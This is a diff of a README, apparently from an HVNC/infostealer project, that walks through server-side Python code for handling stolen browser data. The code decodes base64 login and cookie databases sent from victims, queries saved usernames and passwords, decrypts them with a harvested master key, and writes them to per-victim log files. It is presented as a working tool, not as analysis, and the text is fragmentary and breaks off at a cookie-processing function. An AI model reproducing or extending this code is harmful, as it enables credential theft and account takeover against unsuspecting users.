DevilBot000/HVNC-HTML/README.md

     with open(db_path, 'wb ') as db_file:
     db_file.write(decoded_data)

-[/CODE] This code decodes files from base64, namely databases with logins and passwords.
+This code decodes files from base64, namely databases with logins and passwords.
 Then these decoded files are written to the log folder that we created earlier.
-[CODE=python]
+[python]

     if (param_name == "login_data"):
     connection = sqlite3.connect(db_path)
     cursor = connection.cursor()
     cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
-[/CODE] If JSON contains the login_data parameter, then in this case a connection to this database occurs [CODE=python]
+If JSON contains the login_data parameter, then in this case a connection to this database occurs [python]

     origin_url = row[0]
     username_value = row[1]
     encrypted_password = row[2]
-[/CODE] These rows are responsible for extracting data from the columns [CODE=python]
+These rows are responsible for extracting data from the columns [python]

     decrypted_password = decrypt_password(encrypted_password, key)
-[/CODE]The decrypt_password function is called and passed the encrypted password and the key     that was previously decoded from base64.
+The decrypt_password function is called and passed the encrypted password and the key     that was previously decoded from base64.
-[CODE=python]
+[python]

     passwords_file.write(f'Browser: {browser_name}\n')
     passwords_file.write(f'Origin URL: {origin_url}\n')
     passwords_file.write(f'Username: {username_value}\n' )
     passwords_file.write(f'Password: {decrypted_password}\n')
-[/CODE] Write data from database columns to a previously created text file for passwords, and the     decrypted password itself.
+Write data from database columns to a previously created text file for passwords, and the     decrypted password itself.
-[CODE=python]
+[python]

     elif param_name == "cookies":
     cookies_file_path = os.path.join(unique_id_logs_dir,
                                      f'cookies_{browser_name}_{idx}.txt')
     process_cookies(decoded_data, key, cookies_file_path)
     print(f"File {db_name} was successfully saved and cookies were decrypted.")
-[/CODE] In this code, it first checks whether there is a cookies parameter in the JSON; if it exists, then the path for saving the file is formed.
+In this code, it first checks whether there is a cookies parameter in the JSON; if it exists, then the path for saving the file is formed.
-[CODE=python]
+[python]

     process_cookies(decoded_data, key, cookies_file_path)
-[/CODE] The process_cookie function is called, which is passed the key, decoded cookie data and the path to the file in which the cookies will be written.
+The process_cookie function is called, which is passed the key, decoded cookie data and the path to the file in which the cookies will be written.
 We have already discussed the decryption function earlier in an example of how it all works.
 So let's look at the process_cookies function for working with cookies.

-[CODE=python]
+[python]

     def process_cookies(cookies_db, master_key, cookies_file_path):